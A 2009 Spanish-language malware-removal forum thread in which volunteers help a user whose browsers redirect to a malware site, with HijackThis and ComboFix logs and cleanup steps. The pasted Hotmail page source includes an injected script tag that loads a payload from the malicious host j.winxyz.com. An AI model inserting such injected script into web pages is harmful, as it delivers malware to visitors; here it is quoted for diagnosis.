Foro de InfoSpyware - Foro de Hijackthis - Foro de Virus

Hace ya un tiempo que tengo problemas con las pc de una red que al ingresar a paginas web que utilizan java script redireccionan automaticamente a una pagina que descarga malweare (j.winxyz.com), lo soluciono bloqueando el java script en los exploradores pero eso no tiene mucho sentido ya que hay paginas q quedan inutilizables.
Aparte les comento que el problema arranca a las 9 de la mañana, o sea que puede ser alguna pc que se enciende en ese momento y produce algo o que el script este programado para trabajar desde esa hora??
a las compus donde aparece le pase de todo (malwarebytes, antivirus online, hijack, etc, etc, etc) y no detectan nada.
si alguien me puede dar una mano con esto le estaria muy agradecido....

Hola fede_rio3:

Descarga y ejecuta para generar un log (Opción 1) de HijackThis y pega el reporte en este mismo tema.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 03:28:13 p.m., on 22/10/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Archivos de programa\Avira\AntiVir Desktop\sched.exe
C:\WINDOWS\Explorer.EXE
C:\Archivos de programa\Avira\AntiVir Desktop\avgnt.exe
C:\Archivos de programa\Trend Micro\HijackThis\HijackThis.exe
C:\Archivos de programa\Avira\AntiVir Desktop\avguard.exe
C:\Archivos de programa\Google\Update\GoogleUpdate.exe
C:\Archivos de programa\Google\Common\Google Updater\GoogleUpdaterService.exe
C:\Archivos de programa\Archivos comunes\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Archivos de programa\Nero\Nero8\Nero BackItUp\NBService.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\IoctlSvc.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Archivos de programa\Mozilla Firefox\firefox.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Vínculos
R3 - URLSearchHook: Barra Yahoo! con bloqueador de ventanas emergentes - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Archivos de programa\Yahoo!\Companion\Installs\cpn\yt.dll
R3 - URLSearchHook: (no name) - {9CB65206-89C4-402c-BA80-02D8C59F9B1D} - C:\Archivos de programa\AskTBar\SrchAstt\1.bin\A5SRCHAS.DLL
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Archivos de programa\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Archivos de programa\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Archivos de programa\Archivos comunes\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Ask Search Assistant BHO - {9CB65201-89C4-402c-BA80-02D8C59F9B1D} - C:\Archivos de programa\AskTBar\SrchAstt\1.bin\A5SRCHAS.DLL
O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Archivos de programa\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Archivos de programa\Google\GoogleToolbarNotifier\5.2.4204.170 0\swg.dll
O2 - BHO: PDF-XChange Viewer IE-Plugin - {C5D07EB6-BBCE-4DAE-ACBB-D13A8D28CB1F} - C:\Archivos de programa\Tracker Software\PDF-XChange Viewer\pdf-viewer\PDFXCviewIEPlugin.dll
O2 - BHO: Ask Toolbar BHO - {FE063DB1-4EC0-403e-8DD8-394C54984B2C} - C:\Archivos de programa\AskTBar\bar\1.bin\ASKTBAR.DLL
O3 - Toolbar: Barra Yahoo! con bloqueador de ventanas emergentes - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Archivos de programa\Yahoo!\Companion\Installs\cpn\yt.dll
O3 - Toolbar: PDF de Adobe - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Archivos de programa\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: Ask Toolbar - {FE063DB9-4EC0-403e-8DD8-394C54984B2C} - C:\Archivos de programa\AskTBar\bar\1.bin\ASKTBAR.DLL
O4 - HKLM\..\Run: [avgnt] "C:\Archivos de programa\Avira\AntiVir Desktop\avgnt.exe" /min
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICIO LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Servicio de red')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\WINDOWS\system32\GPhotos.scr/200
O8 - Extra context menu item: Convertir a PDF de Adobe - res://C:\Archivos de programa\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convertir a PDF existente - res://C:\Archivos de programa\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convertir destino de vínculo a PDF existente - res://C:\Archivos de programa\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convertir destino de vínculo en archivo PDF de Adobe - res://C:\Archivos de programa\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convertir selección a archivo PDF existente - res://C:\Archivos de programa\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convertir selección a PDF de Adobe - res://C:\Archivos de programa\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convertir vínculos seleccionados a PDF de Adobe - res://C:\Archivos de programa\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Convertir vínculos seleccionados a PDF existente - res://C:\Archivos de programa\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: E&xportar a Microsoft Excel - res://C:\ARCHIV~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: Referencia - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\ARCHIV~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Archivos de programa\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Archivos de programa\Messenger\msmsgs.exe
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Archivos de programa\Yahoo!\Common\yinsthelper.dll
O17 - HKLM\System\CCS\Services\Tcpip\..\{BB60BE40-EFB5-4C5F-BF6C-3AAC33BEE89A}: NameServer = 200.16.19.1,200.16.16.1
O23 - Service: Adobe LM Service - Adobe Systems - C:\Archivos de programa\Archivos comunes\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Avira AntiVir Scheduler (AntiVirSchedulerService) - Avira GmbH - C:\Archivos de programa\Avira\AntiVir Desktop\sched.exe
O23 - Service: Avira AntiVir Guard (AntiVirService) - Avira GmbH - C:\Archivos de programa\Avira\AntiVir Desktop\avguard.exe
O23 - Service: Autodesk Licensing Service - Autodesk - C:\Archivos de programa\Archivos comunes\Autodesk Shared\Service\AdskScSrv.exe
O23 - Service: Servicio de actualización de Google (gupdate1ca24e13f623e08) (gupdate1ca24e13f623e08) - Google Inc. - C:\Archivos de programa\Google\Update\GoogleUpdate.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Archivos de programa\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: Nero BackItUp Scheduler 3 - Nero AG - C:\Archivos de programa\Nero\Nero8\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - C:\Archivos de programa\Archivos comunes\Nero\Lib\NMIndexingService.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: PLFlash DeviceIoControl Service - Prolific Technology Inc. - C:\WINDOWS\system32\IoctlSvc.exe

--
End of file - 7557 bytes







ACA TE PEGO EL CODIGO FUENTE DE WWW.HOTMAIL.COM QUE TIENEN LAS MAQUINAS INFECTADAS

<script src=http://j.winxyz.com/j.js></script> <!-- ServerInfo: BAYIDSLGN1K18 2009.09.30.02.01.00 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: btsa007:TK1BLD88, -- Version: 6,500,12451,0 -->
<html dir="ltr"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><base href="http://login.live.com/pp650/"/><noscript><meta http-equiv="Refresh" content="0; URL=http://login.live.com/jsDisabled.srf?lc=3082"/>Windows Live ID requiere JavaScript para iniciar sesión. Este explorador web no admite JavaScript o las secuencias de comandos están bloqueadas.<br /><br />Para averiguar si el explorador admite JavaScript o para permitir las secuencias de comandos, consulte la ayuda en pantalla del explorador.</noscript><title>Iniciar sesión</title><meta name="PageID" content="i5030"/><meta name="SiteID" content="64855"/><meta name="ReqLC" content="3082"/><meta name="LocLC" content="3082"/><script type="text/javascript">var g_QS="wa=wsignin1.0&rpsnv=11&ct=1256237587&rver=6. 0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F default.aspx&lc=3082&id=64855&mkt=es-es&bk=1256237598";</script><script type="text/javascript">var srf_sBrHdr='';var srf_sBrTtl='Hotmail';var srf_sBrSTtl='##li4##Eficaz tecnología de Microsoft para combatir el correo no deseado y mejorar la seguridad.##li19##Aumenta tu eficacia gracias a su mayor sencillez y velocidad.##li16##Amplio espacio de almacenamiento y más material atractivo próximamente.##BR## ##BR## ##A##Más información##/A##';var srf_uBrImg='';var srf_sUpLnk='http://mail.live.com/mail/about.aspx';var srf_sHdrBrnd='';var srf_sPrdBrnd='';var srf_fValProp=1;var srf_fSignup=1;var srf_oTemplate=new Object();var srf_uPost='https://login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1256237587&rver =6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com %2Fdefault.aspx&lc=3082&id=64855&mkt=es-es&bk=1256237598';var srf_uRet="http://mail.live.com/default.aspx";var srf_uSSL='https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&rver=6.0.5285.0&w p=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.as px&lc=3082&id=64855&mkt=es-es&bk=67998937';var srf_uReg="https://signup.live.com/signup.aspx?ru=http%3a%2f%2fmail.live.com%2f%3frru %3dinbox&wa=wsignin1.0&rpsnv=11&ct=1256237587&rver =6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com %2Fdefault.aspx&lc=3082&id=64855&mkt=es-es&bk=1256237598&cru=http://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26rver%3d 6.0.5285.0%26wp%3dMBI%26wreply%3dhttp:%252F%252Fma il.live.com%252Fdefault.aspx%26lc%3d3082%26id%3d64 855%26mkt%3des-es";var srf_uPwRst="https://login.live.com/resetpw.srf?wa=wsignin1.0&rpsnv=11&ct=1256237587&r ver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live. com%2Fdefault.aspx&id=64855&mkt=es-es&bk=1256237598&lc=3082";var srf_uPrivacy="http://login.live.com/gls.srf?urlID=MSNPrivacyStatement&lc=3082&vv=650"; var srf_uPinRst="javascript:DoHelp('sdarc_tarms_tuoba' ,'','3082','DH_MSN,3082','','650','&format=b1');"; var srf_uLogin = "http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1256237587&rve r=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.co m%2Fdefault.aspx&id=64855&mkt=es-es&vv=650&lc=3082";var srf_uRDScript='RDHelper_JS.srf?x=6.5.11760.0&lc=30 82';var srf_uEIDScript='EIDHelper_JS.srf?x=6.5.11760.0&lc= 3082';var srf_uSwUsr='http://login.live.com/logout.srf?wa=wsignin1.0&rpsnv=11&ct=1256237587&rv er=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.c om%2Fdefault.aspx&lc=3082&id=64855&mkt=es-es&wlsu=1&ru=http://mail.live.com/default.aspx&bk=1256237598&lm=I';var srf_iCredType=0;var srf_fCSObj=1;var srf_fEIDFlowEnabled=1;var srf_fCollectPin=1;var srf_fAsyncDLEnabled=1;var srf_fLateCk=1;var srf_aFedTiers=[3,1];var srf_sFedQS='wa=wsignin1.0&wtrealm=uri:WindowsLiveI D&wctx=wa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1256237 587%26rver%3D6.0.5285.0%26wp%3DMBI%26wreply%3Dhttp :%252F%252Fmail.live.com%252Fdefault.aspx%26lc%3D3 082%26id%3D64855%26mkt%3Des-es%26bk%3D1256237598';var srf_iFedState=0;srf_sBlkDom=',,';var srf_RDAJAX=1;var g_RDHash=1;var srf_fEnInstr=1;var srf_sRBlob='Pa';var srf_sNUsr='';var srf_sLOpt='';var srf_iCredPostType='';var srf_sPreMn='';var srf_sDispMn='';var srf_sFT='<input type="hidden" name="PPFT" id="i0327" value="B6891X1n52HWpdhq6kC9XvbKi1!1VBUo1QA6cqcorPH bzAxSKrVvpN*7rFGL7Xrz!238u5Ur*wZy2BXmscGRFLNoD8kg9 6G3ZLMgJoLXI5H7aIgFlHHIHqlL7h*E4e7ny1zfofSLuW6Sgai RjxWRu!f*d99QKMmkO!XosT3ql59mDKoAAJA2znrASvMO"/>';</script><link rel="stylesheet" type="text/css" href="css/WEBWinLive3082.css?x=6.500.12451.00"/><script type="text/javascript" src="WLLogin_JS.srf?x=6.5.11760.0&lc=3082"></script>
<style type="text/css">
.cssBtnRest input{background-image: url(http://img.wlxrs.com/~Live.SiteContent.ID/~14.2.1230/~/~/~/btnbkgnd_rest.gif);}
.cssLT{background-image: url(http://img.wlxrs.com/~Live.SiteContent.ID/~14.2.1230/~/~/~/utbkgnd.gif);}
.cssLTMore{background-image: url(http://img.wlxrs.com/~Live.SiteContent.ID/~14.2.1230/~/~/~/utbkgnd.gif);}
.cssWLGradientIMG,.cssWLGradientIMGSSL{background-image: url(http://img2.wlxrs.com/~Live.SiteContent.ID/~14.2.1230/~/~/~/wave3header.jpg);}
.higbutton{background-image: url(http://img.wlxrs.com/~Live.SiteContent.ID/~14.2.1230/~/~/~/btnbkgnd_rest.gif);}
.higbuttonblue{background-image: url(http://img.wlxrs.com/~Live.SiteContent.ID/~14.2.1230/~/~/~/btnbkgnd_hot.gif);}
</style>
</head>
<body onload="onLoad_Login();">
</body></html>



apenas arranca el codigo fuente esta el direccionamiento a j.winxyz.com

Con todos los programas cerrados ejecutas hijackthis y le das a esta entrada:

R3 - URLSearchHook: (no name) - {9CB65206-89C4-402c-BA80-02D8C59F9B1D} - C:\Archivos de programa\AskTBar\SrchAstt\1.bin\A5SRCHAS.DLL

luego busca y elimina esta carpeta.
C:\Archivos de programa\AskTBar

Descarga Actualiza y Ejecuta en Modo Completo MalwareBytes-anti malware (leer manual) Manda a cuarentena lo detectado por MalwareBytes para luego poder eliminarlo, apretando en el botón quitar seleccionado.luego de reiniciar la pc en la pestaña registros abri el log para copiar y pegar en este tema.


Descarga CCleaner y ejecútalo usando primero su opción de "Limpiador" para borrar cookies, temporales de Internet y todos los archivos que este te muestre como obsoletos, y luego usa su opción de "Registro" para limpiar todo el registro de Windows (haciendo copia de seguridad).


- Descarga la herramienta ComboFix.exe y guárdala en el escritorio.

• Desactiva temporalmente el Antivirus y/o Antispyware.
• Cierra todas las ventanas abiertas.
• Haz doble clic al archivo ComboFix.exe y sigue las instrucciones.
• Cuando termine, generará un registro en C:\ComboFix.txt.
  • *Nota* Mientras CF este trabajando no mover el mouse ya que pararía su proceso.
  • *Nota* ComboFix puede reiniciar automáticamente el PC para completar el proceso de eliminación.

• Reinicia y pega el reporte de C:\ComboFix.txt en este mismo mensaje.

Saludos

MALWARE DETECTO

Claves del Registro Infectadas:
HKEY_CLASSES_ROOT\CLSID\{147a976f-eee1-4377-8ea7-4716e4cdd239} (Adware.MyWebSearch) -> Quarantined and deleted successfully.





ComboFix 09-10-22.01 - 23/10/2009 10:04.1.2 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.3.1252.54.3082.18.1023.604 [GMT -3:00]
Running from: c:\documents and settings\USER\Escritorio\ComboFix.exe
AV: AntiVir Desktop *On-access scanning disabled* (Updated) {AD166499-45F9-482A-A743-FDD3350758C7}

WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.

((((((((((((((((((((((((( Files Created from 2009-09-23 to 2009-10-23 )))))))))))))))))))))))))))))))
.

2009-10-22 18:25 . 2009-10-22 18:25 -------- d-----w- c:\archivos de programa\Trend Micro
2009-09-28 13:03 . 2009-09-28 13:03 -------- d-----w- c:\documents and settings\Zanazzi\Datos de programa\Apple Computer
2009-09-28 13:01 . 2009-09-28 13:02 -------- d-----w- c:\archivos de programa\QuickTime
2009-09-28 13:01 . 2009-09-28 13:01 -------- d-----w- c:\documents and settings\All Users\Datos de programa\Apple Computer
2009-09-28 13:01 . 2009-09-28 13:01 -------- d-----w- c:\archivos de programa\Archivos comunes\Apple
2009-09-28 13:01 . 2009-09-28 13:01 -------- d-----w- c:\archivos de programa\Apple Software Update
2009-09-28 13:01 . 2009-09-28 13:01 -------- d-----w- c:\documents and settings\All Users\Datos de programa\Apple

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))) ))
.
2009-10-23 12:41 . 2009-04-23 06:04 -------- d-----w- c:\archivos de programa\Malwarebytes' Anti-Malware
2009-10-23 12:40 . 2009-10-23 12:40 693760 ----a-w- c:\windows\isRS-000.tmp
2009-10-15 13:53 . 2009-05-06 15:14 -------- d-----w- c:\documents and settings\Zanazzi\Datos de programa\CmapTools
2009-09-25 05:36 . 2004-08-20 12:00 669696 ----a-w- c:\windows\system32\wininet.dll
2009-09-25 05:36 . 2004-08-20 12:00 81920 ----a-w- c:\windows\system32\ieencode.dll
2009-09-21 16:37 . 2009-09-21 16:37 -------- d-----w- c:\documents and settings\All Users\Datos de programa\Avira
2009-09-21 16:37 . 2009-09-21 16:37 -------- d-----w- c:\archivos de programa\Avira
2009-09-11 14:18 . 2004-08-20 12:00 136192 ----a-w- c:\windows\system32\msv1_0.dll
2009-09-10 17:54 . 2009-04-23 06:05 38224 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2009-09-10 17:53 . 2009-04-23 06:05 19160 ----a-w- c:\windows\system32\drivers\mbam.sys
2009-09-08 16:39 . 2009-09-08 16:36 -------- d-----w- c:\archivos de programa\VS Revo Group
2009-09-08 16:34 . 2009-09-08 16:33 -------- d-----w- c:\archivos de programa\Abacux Premium
2009-09-08 16:33 . 2009-05-26 14:56 253952 ------w- c:\windows\Setup1.exe
2009-09-08 16:33 . 2009-05-26 14:56 74240 ----a-w- c:\windows\ST6UNST.EXE
2009-09-04 21:04 . 2004-08-20 12:00 58880 ----a-w- c:\windows\system32\msasn1.dll
2009-08-26 08:01 . 2004-08-20 12:00 247326 ----a-w- c:\windows\system32\strmdll.dll
2009-08-24 17:35 . 2009-07-01 17:30 -------- d-----w- c:\archivos de programa\Google
2009-08-24 17:29 . 2009-08-24 17:29 -------- d-----w- c:\documents and settings\All Users\Datos de programa\Google Updater
2009-08-06 22:24 . 2009-04-23 05:33 327896 ----a-w- c:\windows\system32\wucltui.dll
2009-08-06 22:24 . 2009-04-23 05:33 209632 ----a-w- c:\windows\system32\wuweb.dll
2009-08-06 22:24 . 2009-04-23 05:33 35552 ----a-w- c:\windows\system32\wups.dll
2009-08-06 22:24 . 2008-10-16 17:09 44768 ----a-w- c:\windows\system32\wups2.dll
2009-08-06 22:24 . 2009-04-23 05:33 53472 ----a-w- c:\windows\system32\wuauclt.exe
2009-08-06 22:24 . 2004-08-20 12:00 96480 ----a-w- c:\windows\system32\cdm.dll
2009-08-06 22:23 . 2009-04-23 05:33 575704 ----a-w- c:\windows\system32\wuapi.dll
2009-08-06 22:23 . 2009-04-23 05:33 1929952 ----a-w- c:\windows\system32\wuaueng.dll
2009-08-05 09:00 . 2004-08-20 12:00 205312 ----a-w- c:\windows\system32\mswebdvd.dll
2009-08-04 17:27 . 2004-08-20 12:00 2147840 ----a-w- c:\windows\system32\ntoskrnl.exe
2009-08-04 17:27 . 2004-08-19 15:33 2026496 ----a-w- c:\windows\system32\ntkrnlpa.exe
2009-07-31 19:53 . 2009-07-31 19:53 68304 ---ha-w- c:\windows\system32\mlfcache.dat
2009-07-28 19:33 . 2009-09-21 16:37 55656 ----a-w- c:\windows\system32\drivers\avgntflt.sys
2007-11-19 14:17 . 2009-04-23 08:05 541184 ----a-w- c:\archivos de programa\Unidades.exe
2006-01-06 01:43 . 2009-04-23 08:05 463872 ----a-w- c:\archivos de programa\Conversiones.exe
1993-04-16 22:49 . 2009-04-23 08:05 291335 ----a-w- c:\archivos de programa\PTABLE.EXE
.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run]
"avgnt"="c:\archivos de programa\Avira\AntiVir Desktop\avgnt.exe" [2009-03-02 209153]
"NvCplDaemon"="c:\windows\system32\NvCpl.dll" [2007-11-06 8523776]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\Cur rentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-14 15360]

[HKLM\~\services\sharedaccess\parameters\firewallpo licy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"c:\\Archivos de programa\\MSN Messenger\\msnmsgr.exe"=
"c:\\Archivos de programa\\MSN Messenger\\livecall.exe"=
"c:\\Archivos de programa\\IHMC CmapTools\\jre\\bin\\javaw.exe"=
"c:\\Archivos de programa\\Archivos comunes\\Nero\\Nero Web\\SetupX.exe"=

R2 AntiVirSchedulerService;Avira AntiVir Scheduler;c:\archivos de programa\Avira\AntiVir Desktop\sched.exe [21/09/2009 01:37 p.m. 108289]
S2 gupdate1ca24e13f623e08;Servicio de actualización de Google (gupdate1ca24e13f623e08);c:\archivos de programa\Google\Update\GoogleUpdate.exe [24/08/2009 02:35 p.m. 133104]
.
Contents of the 'Scheduled Tasks' folder

2009-09-28 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\archivos de programa\Apple Software Update\SoftwareUpdate.exe [2008-07-30 15:34]

2009-10-23 c:\windows\Tasks\Google Software Updater.job
- c:\archivos de programa\Google\Common\Google Updater\GoogleUpdaterService.exe [2009-07-01 17:29]

2009-10-23 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\archivos de programa\Google\Update\GoogleUpdate.exe [2009-08-24 17:35]

2009-10-23 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\archivos de programa\Google\Update\GoogleUpdate.exe [2009-08-24 17:35]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com.ar/
uInternet Connection Wizard,ShellNext = iexplore
IE: Convertir a PDF de Adobe - c:\archivos de programa\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convertir a PDF existente - c:\archivos de programa\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convertir destino de vínculo a PDF existente - c:\archivos de programa\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convertir destino de vínculo en archivo PDF de Adobe - c:\archivos de programa\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convertir selección a archivo PDF existente - c:\archivos de programa\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convertir selección a PDF de Adobe - c:\archivos de programa\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convertir vínculos seleccionados a PDF de Adobe - c:\archivos de programa\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convertir vínculos seleccionados a PDF existente - c:\archivos de programa\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: E&xportar a Microsoft Excel - c:\archiv~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
TCP: {BB60BE40-EFB5-4C5F-BF6C-3AAC33BEE89A} = 200.16.16.1,200.16.19.1
FF - ProfilePath - c:\documents and settings\Zanazzi\Datos de programa\Mozilla\Firefox\Profiles\czz4ma89.default \
FF - prefs.js: browser.startup.homepage - hxxp://www.google.com.ar/webhp?client=firefox-a&rls=org.mozilla:es-ES:official&channel=s&hl=es&btnG=Buscar+con+Google
FF - plugin: c:\archivos de programa\Google\Google Updater\2.4.1691.8062\npCIDetect13.dll
FF - plugin: c:\archivos de programa\Google\Picasa3\npPicasa3.dll
FF - plugin: c:\archivos de programa\Google\Update\1.2.183.7\npGoogleOneClick8 .dll
.
- - - - ORPHANS REMOVED - - - -

AddRemove-NFC0001 - b:\DeIsL1.isu



************************************************** ************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-10-23 10:06
Windows 5.1.2600 Service Pack 3 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

************************************************** ************************
.
Completion time: 2009-10-23 10:07
ComboFix-quarantined-files.txt 2009-10-23 13:06

Pre-Run: 26.451.820.544 bytes libres
Post-Run: 26.545.385.472 bytes libres

- - End Of File - - BDC3C20950853B26F549C506941373E7


slaudos

seguis teniendo el problema del redireccionamiento?

ya se soluciono el problema.... gracias

Desinstala CF de esta manera:

* Ir a Inicio > Ejecutar
* Escribir lo siguiente: ComboFix /u como muestra la imagen debajo:


* Esto activara el desinstalador de ComboFix abriendo su pantalla principal y luego de unos segundos veras ("ComboFix is uninstalled")

Si no tienes ninguna otra duda damos el tema por solucionado, cualquier problema con este mismo tema,enviás un MP a cualquier miembro del staff para que se te reabra y puedas continuarlo, das las razones de reapertura por medio de este botón: arriba a la derecha de tu post...

Cualquier cosa que necesites ya sabes donde encontrarnos


Saludos!

Tema Solucionado